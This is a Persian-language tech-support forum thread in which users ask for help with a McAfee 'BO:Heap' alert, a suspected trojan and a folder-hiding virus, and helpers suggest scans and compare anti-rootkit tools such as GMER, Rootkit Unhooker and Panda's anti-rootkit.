سیستمت را اسکن کن و گزارش آن را اینجا بگذار ( ولی اگر چیزی پیدا کرد آن را پاک نکن ):

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

سلام دوستان
دوسه روزي است كه كاميپوترم پس از بالا آمدن دو پيام پشت سر هم ميده كه ويروس bo:heap روي ايترنت اكسپلورر وجود داره و آنتي ويروس من كه مك آفي ورژن 8i هست فقط اونو بلوكه ميكنه خسارت اين ويروس اورفلو كردن بافره و به همين علت اسمش با bo شروع ميشه. چه انتي ويروسي ميتونه اونو از بين ببره ممنون ميشم اگه كمك كنيد

3.فایل زیر را داونلود کن ( حجم=257 کیلوبایت ) و پس از باز کردن آن و فعال کردن گزینه In-Depth Scan Enabled

سیستمت را اسکن کن و گزارش آن را اینجا بگذار ( ولی اگر چیزی پیدا کرد آن را پاک نکن ):

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

سلام دوست عزیز
عزیز جون این لینک کار نمی کند

در ضمن این کارهایی رو که گفتی زمان انجام بدم که ویروس داخل سیستم اکتیو هست و داره فعالیت میکنه آره؟

در ضمن یکی از دوستان میگفت که این یه تروجان هست و اسمش nepwall هست حالا دیگه راست و دروغش با اون

مرسسسسسسسییییییییی

سلام دوست عزیز
عزیز جون این لینک کار نمی کند

در ضمن این کارهایی رو که گفتی زمان انجام بدم که ویروس داخل سیستم اکتیو هست و داره فعالیت میکنه آره؟

در ضمن یکی از دوستان میگفت که این یه تروجان هست و اسمش nepwall هست حالا دیگه راست و دروغش با اون

مرسسسسسسسییییییییی

از این لینک داونلود کن :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

بله دوست عزیز اسکن را باید زمانی که ویروس فعال است انجام بدهی.

سلام دوستان
دوسه روزي است كه كاميپوترم پس از بالا آمدن دو پيام پشت سر هم ميده كه ويروس bo:heap روي ايترنت اكسپلورر وجود داره و آنتي ويروس من كه مك آفي ورژن 8i هست فقط اونو بلوكه ميكنه خسارت اين ويروس اورفلو كردن بافره و به همين علت اسمش با bo شروع ميشه. چه انتي ويروسي ميتونه اونو از بين ببره ممنون ميشم اگه كمك كنيد

این را فقط مک آفی گزارش می کند که در اغلب موارد ناشی از ویروسها نیست .اگر از ویندوز XP استفاده می کنی

این کاری را که می گویم انجام بده ببین مشکلت حل می شود یا نه :

در ویندوز به آدرس زیر برو :

Start > Run

و در پنجره Run کلمه CMD را بنویس ودر صفحه داس باز شده عبارت زیر را تایپ کن :




برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

فقط یادت باشد به جای X نام درایوی را که ویندوز روی آن نصب شده است مثلا C را بنویسی و فاصل و نشانه ها را

هم حذف نکنی.به فاصله بین "" و / دقت کن.

از این لینک داونلود کن :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

بله دوست عزیز اسکن را باید زمانی که ویروس فعال است انجام بدهی.

سلام Vtn جان
یک تست می تونی از آنتی روت کیت ها بذاری؟:27:
یا خودت بگو که بهترین کدومه!!!(((حرف شما برام از تست هم بیشتر اهمیت داره))):10: :46:

سلام Vtn جان
یک تست می تونی از آنتی روت کیت ها بذاری؟:27:
یا خودت بگو که بهترین کدومه!!!(((حرف شما برام از تست هم بیشتر اهمیت داره))):10: :46:

دوست عزیز اینجا جاش نیست ولی حالا که پرسیدی باید بگویم که فعلا هیچ تست درست و حسابی روی روت کیتها انجام

نشده است آنتی روت کیتها به دو دسته تقسیم می شوند یک دسته که جنبه کاملا حرفه ای دارند و کار کردن با آنها برای

کاربران عادی سخت است ولی در عوض موثرتر هستند مثل GMER , Rootkit Unhooker , Ice Sword و ... که در بین این

گروه به نظر اکثر کارشناسان Rootkit Unhooker موثرتر بوده و امکانات بیشتری هم عرضه می کند .گروه دوم شامل آنتی

روت کیتهایی هستند که شرکتهای بزرگ امنیتی اغلب به صورت رایگان طراحی کرده اند این گروه اگر چه مانند گروه اول

موثر نیستند ولی کارکردن با آنها برای کاربران عادی هم راحت بوده و اغلب با نرم افزارهای دیگر هم سازگارند از این گروه

هم می توان به آنتی روت کیتهای منتشر شده توسط AVG ,F-Secure , Sophos , Panda , PC-Cillin و ... غیره اشاره

کرد که از بین اینها به نظر آنتی روت کیت پاندا که تازه هم از مرحله بتا خارج شده است از بقیه موثرتر و کاملتر است

( این آنتی روت کیت رجیستری را هم اسکن می کند ) .البته همانطور که می دانی خاصیت آنتی روت کیت در اکثر

آنتی ویروسها و آنتی اسپایورهای حال حاضر وجود دارد .ازبین این دسته سوپر آنتی اسپایور شهرت خوبی در

شناسایی و پاک کردن روت کیت هایی دارد که بقیه از پاک کردن آنها عاجزند.

دوست عزیز اینجا جاش نیست ولی حالا که پرسیدی باید بگویم که فعلا هیچ تست درست و حسابی روی روت کیتها انجام

نشده است آنتی روت کیتها به دو دسته تقسیم می شوند یک دسته که جنبه کاملا حرفه ای دارند و کار کردن با آنها برای

کاربران عادی سخت است ولی در عوض موثرتر هستند مثل GMER , Rootkit Unhooker , Ice Sword و ... که در بین این

گروه به نظر اکثر کارشناسان Rootkit Unhooker موثرتر بوده و امکانات بیشتری هم عرضه می کند .گروه دوم شامل آنتی

روت کیتهایی هستند که شرکتهای بزرگ امنیتی اغلب به صورت رایگان طراحی کرده اند این گروه اگر چه مانند گروه اول

موثر نیستند ولی کارکردن با آنها برای کاربران عادی هم راحت بوده و اغلب با نرم افزارهای دیگر هم سازگارند از این گروه

هم می توان به آنتی روت کیتهای منتشر شده توسط AVG ,F-Secure , Sophos , Panda , PC-Cillin و ... غیره اشاره

کرد که از بین اینها به نظر آنتی روت کیت پاندا که تازه هم از مرحله بتا خارج شده است از بقیه موثرتر و کاملتر است

( این آنتی روت کیت رجیستری را هم اسکن می کند ) .البته همانطور که می دانی خاصیت آنتی روت کیت در اکثر

آنتی ویروسها و آنتی اسپایورهای حال حاضر وجود دارد .ازبین این دسته سوپر آنتی اسپایور شهرت خوبی در

شناسایی و پاک کردن روت کیت هایی دارد که بقیه از پاک کردن آنها عاجزند.

سلام مجدد به دوست گلم:11:
دوست عزیز شما از چه آنتی روت کیتی استفاده می کنی؟
من از اون نوع اول Rootkit Unhooker قبلا انتخاب کرده بودم و باهاش کار کرده بودم!!!
کار باهاش خیلی سخت بود اما کار با Sophos خیلی راحت تر بود میتونی کار با Rootkit Unhooker بهم یاد بدی؟
ممنون:40:

اين ويروس بيشتر اكستنشن هاي فولدر ها رو تبديل به Exeميكنه.........قابليت كپي كردن فولدر رو از بين ميبره......واگر فولدري رو كپي كني محتويات داخل آن كپي نميشود.......اگر با مك آفي آنرا ويروس كشي كني پاك ميشه ظاهرا ولي تمامي فولدر هاي آلوده را Hiddenكرده و آدرس آنها رو از بين ميبره....بصورت فيزيكي وجود دارند ولي شما آنها را نميبينيد و به آنها دسترسي نداريد....و نمي توانيد فولدري به همان نام بسازيد چون روي هارد وجود دارد.....در Properties اين فولدر ها آپشن هيدن تيك خورده و غير فعال شده......چطور ميشه اين آپشن را فعال كرد؟.....و اساسا با اين معظل چگونه برخورد كنيم؟